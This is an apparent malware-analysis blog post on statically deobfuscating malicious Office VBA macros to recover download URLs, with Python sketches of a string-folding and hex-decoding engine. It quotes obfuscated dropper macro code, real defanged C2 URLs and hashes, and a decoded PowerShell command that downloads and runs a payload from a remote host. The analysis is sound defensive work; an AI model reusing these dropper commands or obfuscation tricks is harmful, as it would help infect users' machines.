Saturday, March 14, 2015

Analyzing obfuscated VBA macros to extract C2 IP/URLs regardless of runtime behavior

Introduction

Lately, our malware analysis service has been seeing quite a lot of Office documents (or XML files with embedded Office documents, etc.) that carry embedded VBA macros and try to drop Dridex or similar malware. Internally, we use olevba (thanks to Philippe Lagadec for this great tool, by the way!) to extract the VBA macro source code. Sometimes, though, the Word file does not "trigger" (it might include VM detection code, have incompatible requirements, etc.). To extract something useful like a C2 IP/URL nevertheless, we are left with static analysis techniques and an often heavily obfuscated macro source. Here's an example:
Function \xe2\xe0\xfb\xe2\xc0\xc0\xfb\xe2\xef\xfb\xe2\xe0(z0ktwRXRQZl2qo0_ As String, d4ok1z1Z0N As String) As Boolean

\xcf\xd0\xfb\xe2\xe0\xc0 = 
\xce\xf0\xe2\xe0\xe0\xcc\xd0\xce\xeb\xe2\xef\xe2\xe0\xef(0&, 
z0ktwRXRQZl2qo0_, d4ok1z1Z0N, 0&, 0&)

Set \xe3\xed\xc3\xd8\xc0\xcf\xf8\xe2\xfb\xe0 = 
CreateObject(QSzFZhQCxywB(Chr$(83) & Chr$(132) & 
Chr$(104) & Chr$(55) & Chr$(101) & Chr$(87) 
& Chr$(108) & Chr$(89) & Chr$(108) & 
Chr$(131) & Chr$(46) & Chr$(133) & Chr$(65) 
& Chr$(52) & Chr$(112) & Chr$(97) & 
Chr$(112) & Chr$(61) & Chr$(108) & Chr$(117) 
& Chr$(105) & Chr$(47) & Chr$(99) & 
Chr$(110) & Chr$(97) & Chr$(122) & Chr$(116) 
& Chr$(59) & Chr$(105) & Chr$(75) & 
Chr$(111) & Chr$(54) & Chr$(110) & Chr$(115)))
As we can see (even with VB syntax highlighting ;-)), it is not very human friendly, and applying a regex to pull out a URL will not work either. To understand the VBA source better (and possibly apply some patterns), we would need to resolve e.g. the Chr$() calls and the ampersands, concatenate strings and so forth. As this is a pretty straightforward, "dumb" and time-consuming manual process, we had an idea: why not try to automate this kind of task? After all, it is crying out for a computer program. So we developed a small "simplifier" engine/algorithm that makes multiple passes over the various VBA functions to resolve and concatenate strings (and a little bit more). Additionally, we implemented some semi-intelligent brute-force mechanisms to extract URLs from the "simplified source code", as URLs are often padded with trash bytes or hidden by other simple algorithms.
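To give a feeling for the idea, here is a minimal Python sketch (not our actual engine). It folds constant Chr$() calls and concatenations into one literal and then brute-forces a "keep every n-th character" de-padding. The names fold_strings and depad_candidates and the PROGID filter are hypothetical, and since the decoder function QSzFZhQCxywB is not shown above, the sketch simply assumes that it drops padding characters at a fixed stride.

```python
import re

# An "atom" is a VBA string literal ("" escapes a quote) or a Chr()/Chr$()
# call with a constant numeric argument.
ATOM = r'(?:"(?:[^"]|"")*"|\bChr\$?\(\s*\d+\s*\))'
ATOM_RE = re.compile(ATOM, re.IGNORECASE)
# A maximal run of atoms joined by the concatenation operators & and +.
RUN_RE = re.compile(ATOM + r'(?:\s*[&+]\s*' + ATOM + r')*', re.IGNORECASE)


def atom_value(atom):
    """Return the text a single atom evaluates to."""
    if atom.startswith('"'):
        return atom[1:-1].replace('""', '"')
    # Approximation: VBA's Chr() uses the ANSI code page, chr() uses Unicode.
    return chr(int(re.search(r'\d+', atom).group()))


def fold_strings(source):
    """Replace each run of literals/Chr() calls with one string literal."""
    def fold(match):
        text = ''.join(atom_value(a) for a in ATOM_RE.findall(match.group()))
        return '"' + text.replace('"', '""') + '"'
    return RUN_RE.sub(fold, source)


def depad_candidates(text, pattern, max_stride=4):
    """Try every stride/offset slice and keep those that fully match pattern."""
    hits = []
    for stride in range(1, max_stride + 1):
        for offset in range(stride):
            candidate = text[offset::stride]
            if re.fullmatch(pattern, candidate):
                hits.append((stride, offset, candidate))
    return hits


# The Chr$() chain from the example above, joined onto one logical line.
OBFUSCATED = (
    'Chr$(83) & Chr$(132) & Chr$(104) & Chr$(55) & Chr$(101) & Chr$(87) & '
    'Chr$(108) & Chr$(89) & Chr$(108) & Chr$(131) & Chr$(46) & Chr$(133) & '
    'Chr$(65) & Chr$(52) & Chr$(112) & Chr$(97) & Chr$(112) & Chr$(61) & '
    'Chr$(108) & Chr$(117) & Chr$(105) & Chr$(47) & Chr$(99) & Chr$(110) & '
    'Chr$(97) & Chr$(122) & Chr$(116) & Chr$(59) & Chr$(105) & Chr$(75) & '
    'Chr$(111) & Chr$(54) & Chr$(110) & Chr$(115)'
)

folded = fold_strings(OBFUSCATED)        # one literal, still padded with junk
PROGID = r'[A-Za-z]+(?:\.[A-Za-z]+)+'    # hypothetical "looks like a ProgID" filter
hits = depad_candidates(atom_value(folded), PROGID)
print(hits[0])  # (2, 0, 'Shell.Application')
```

On the sample above, the slice with stride 2 and offset 0 reads Shell.Application. Short slices at larger strides can also match a loose filter by accident, so a real implementation would need to rank or validate its candidates.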

Here is a "before/after" example to make this "simplification" a bit easier to understand.

Before

URLLSK = "www.asivamosensalud.org/images/log"

STAA = "savepic.su/5238122"

STAB = "savepic.su/5233002"

...

Print #Kasdwq, "c" & "s" + "c" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\W" + "indows\T" + "emp" + "\" + VBTXP + Chr(34)

Print #Kasdwq, "pin" + "g 2.2.1.1 -n" & " 2" + ""

Print #Kasdwq, "" + "c:\W" + "indows\Te" + "mp\444" + "." + Chr(Asc("e")) + Chr(Asc("x")) + Chr(Asc("e"))

...

Print #FileNumber, "strRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + "://" + URLLSK + "." + Chr(Asc("j")) + Chr(Asc("p")) + "g" + Chr(34)

Print #FileNumber, "statRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + "://" + STAA + "." + Chr(Asc("p")) + Chr(Asc("n")) + "g" + Chr(34)
    

After

Print #Kasdwq, "cscript.exe "c:\Windows\Temp\adobeacd-updatexp.vbs""

Print #Kasdwq, "ping 2.2.1.1 -n 2"

Print #Kasdwq, "c:\Windows\Temp\444.exe"

...

Print #FileNumber, "strRT = "http://www.asivamosensalud.org/images/log.jpg""

Print #FileNumber, "statRT = "http://savepic.su/5238122.png""

While the above example is rather simple, it still shows the basic principle and even includes a "constant propagation" step for variables (see "URLLSK" and "STAA" in the "Before" code).
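The multi-pass idea with constant propagation can be sketched in a few lines of Python. This is an illustration under simplifying assumptions, not our production code: a variable counts as a constant only if it is assigned exactly once to a plain string literal, scoping between procedures is ignored, and the names simplify and rewrite are hypothetical. Note that the sketch emits valid VBA literals, so embedded quotes appear doubled, unlike in the "After" listing above.

```python
import re

STR = r'"(?:[^"]|"")*"'                           # VBA literal, "" escapes a quote
ATOM = r'(?:' + STR + r'|\bChr\$?\(\s*\d+\s*\))'  # literal or constant Chr() call
ATOM_RE = re.compile(ATOM, re.IGNORECASE)
TOKEN_RE = re.compile(
    r'(?P<run>' + ATOM + r'(?:\s*[&+]\s*' + ATOM + r')*)'  # foldable run
    + r'|\bAsc\(\s*(?P<asc>' + STR + r')\s*\)'             # Asc("x")
    + r'|(?P<name>\b[A-Za-z_]\w*\b)',                      # identifier
    re.IGNORECASE)
ASSIGN_RE = re.compile(r'^(\s*([A-Za-z_]\w*)\s*=\s*)(.*)$')


def unquote(literal):
    return literal[1:-1].replace('""', '"')


def quote(text):
    return '"' + text.replace('"', '""') + '"'


def rewrite(expr, constants):
    """One pass: fold runs, resolve Asc("x"), substitute known constants."""
    def repl(m):
        if m.group('run') is not None:
            parts = ATOM_RE.findall(m.group('run'))
            return quote(''.join(
                unquote(p) if p.startswith('"')
                else chr(int(re.search(r'\d+', p).group()))
                for p in parts))
        if m.group('asc') is not None:
            text = unquote(m.group('asc'))
            return str(ord(text[0])) if text else m.group()
        return constants.get(m.group('name').lower(), m.group())
    return TOKEN_RE.sub(repl, expr)


def simplify(source):
    """Repeat passes until the source no longer changes."""
    lines = source.splitlines()
    while True:
        assigned = {}
        for line in lines:
            m = ASSIGN_RE.match(line)
            if m:
                assigned.setdefault(m.group(2).lower(), []).append(m.group(3).strip())
        # Only names assigned exactly once to a plain literal are propagated.
        constants = {name: values[0] for name, values in assigned.items()
                     if len(values) == 1 and re.fullmatch(STR, values[0])}
        new_lines = []
        for line in lines:
            m = ASSIGN_RE.match(line)
            head, expr = (m.group(1), m.group(3)) if m else ('', line)
            new_lines.append(head + rewrite(expr, constants))
        if new_lines == lines:
            return '\n'.join(lines)
        lines = new_lines


SAMPLE = '''\
URLLSK = "www.asivamosensalud.org/images/log"
Print #FileNumber, "strRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + "://" + URLLSK + "." + Chr(Asc("j")) + Chr(Asc("p")) + "g" + Chr(34)
'''
print(simplify(SAMPLE))
```

The nested Chr(Asc(Chr(Asc("t")))) is the reason for looping until nothing changes: each pass only peels off one layer, and the surrounding literals can only be merged once the innermost call has been resolved.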

 

In Practice

Of course, we tested our new simplification algorithm against a few malicious Word documents, especially those that do not "trigger" (i.e. do not successfully start downloading files). The "non-triggering" samples are the most interesting, as those that execute successfully reveal the alleged C2 URLs and IPs at runtime anyway. Below are a few real-world examples with the corresponding Malwr reports, which underline that neither system triggered the sample or showed any network traffic.

 

Example 1

SHA256: 475aa057202c98a0eab161e1d073390b34312565f98efb6c527c01791805523b
Link: Hybrid-Analysis Report
Link: Malwr Report
VirusTotal: 2/57 (Sophos, TrendMicro) on 13/03/15, 19/57 on 14/03/15
Decoded URL: hxxp://95.163.121.186/api/gbb1.exe

 

Example 2

SHA256: 9683b0eed6bdb1f16607a9cac5c72af2a69839bb591d5f8bfd3efc3963b292c0
Link: Hybrid-Analysis Report
Link: Malwr Report
VirusTotal: 1/57 (Ikarus) on 13/03/15, 23/57 on 14/03/15
Decoded URL: hxxp://accalamh.aspone.cz/js/bin.exe

 

Example 3

SHA256: 8e6bb148ffc0e18c0450a89f7b0ba729a28eb22da12fd3f69d18daa85fd09024
Link: Hybrid-Analysis Report
Link: Malwr Report
VirusTotal: 1/57 (CAT-QuickHeal) on 16/02/15, 35/57 on 14/03/15
Decoded URL: hxxp://91.220.131.28/upd2/install.exe

When you take a look at the Hybrid-Analysis reports generated with the new VBA processing capabilities, you will see the extracted C2 URLs/IPs as a "Found URL in decoded VBA string" signature in the malicious section at the top of the report. This is how it looks:


Of course, the presented simplification will not always yield the desired result, especially when malware authors adapt and introduce more complicated obfuscation techniques. As always, it is a bit of a cat-and-mouse game. Thus, we will keep observing the samples being submitted and try to adapt where we can and where it is necessary. The current version works, but it is also a "proof of concept" that underlines how much room for improvement there is.

Conclusion

In our opinion, we can draw at least the following conclusions:
  • static analysis can be very important in the context of malware analysis, if we are a little bit more intelligent about it
  • from the small AV benchmark (see VirusTotal results above): about 1/3 of AV vendors seem to react to new threats quite quickly, within 24 hours or a few days, while about 2/3 of AV vendors seem to react within the first couple of weeks. A lot of vendors seem to have issues with a zero-day Word document, although it would be possible to detect malicious characteristics using pure static analysis
///

Update: a small "add-on" to the decoding technique presented above. We have been getting some samples that try to hide URLs and other interesting strings using a simple hex-encoded ASCII string. Here is a good example:

https://www.hybrid-analysis.com/sample/83758075cd5d2538d77cb5b723fab1656455f0639f59d59898b23fb593bf3871

If we scroll down to the "Contains embedded VBA macros" signature and expand it, we can see the following VBA code:


The decoded string is actually:

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('hxxp://193.26.217.197/instana/vsacz.exe','%TEMP%\BKHkjgkKKJdf.cab'); expand %TEMP%\BKHkjgkKKJdf.cab %TEMP%\BKHkjgkKKJdf.exe; start %TEMP%\BKHkjgkKKJdf.exe;

Ouch! ;-)

We updated our algorithm to also decode this kind of string and forward the result to the behavior signature interface (thereby triggering string-related signatures and detecting the URL).
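A rough Python sketch of such a hex-decoding pass could look like the following. The function name decode_hex_strings, the minimum length of 8 bytes and the URL pattern are our assumptions for illustration. The macro line is built at runtime from a fragment of the decoded string shown above; it is not the sample's actual VBA code.

```python
import re
import string

# A string literal made up only of hex byte pairs (at least 8 bytes long).
HEX_LITERAL = re.compile(r'"((?:[0-9A-Fa-f]{2}){8,})"')
# Matches regular and defanged (hxxp) URLs.
URL = re.compile(r'h(?:tt|xx)ps?://[^\s"\']+', re.IGNORECASE)
PRINTABLE = set(string.printable)


def decode_hex_strings(source):
    """Decode hex-only string literals that turn into printable ASCII text."""
    decoded = []
    for match in HEX_LITERAL.finditer(source):
        text = bytes.fromhex(match.group(1)).decode('latin-1')
        # Skip literals that merely happen to consist of hex digits.
        if all(ch in PRINTABLE for ch in text):
            decoded.append(text)
    return decoded


# Illustrative input: hex-encode a fragment of the decoded command line.
fragment = "DownloadFile('hxxp://193.26.217.197/instana/vsacz.exe','%TEMP%\\BKHkjgkKKJdf.cab')"
macro_line = 'cmdline = "' + fragment.encode('ascii').hex().upper() + '"'

for text in decode_hex_strings(macro_line):
    print(text)
    print(URL.findall(text))
```

The printable-text check keeps false positives down, since a long hex literal may also be a legitimate key or identifier rather than hidden text.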
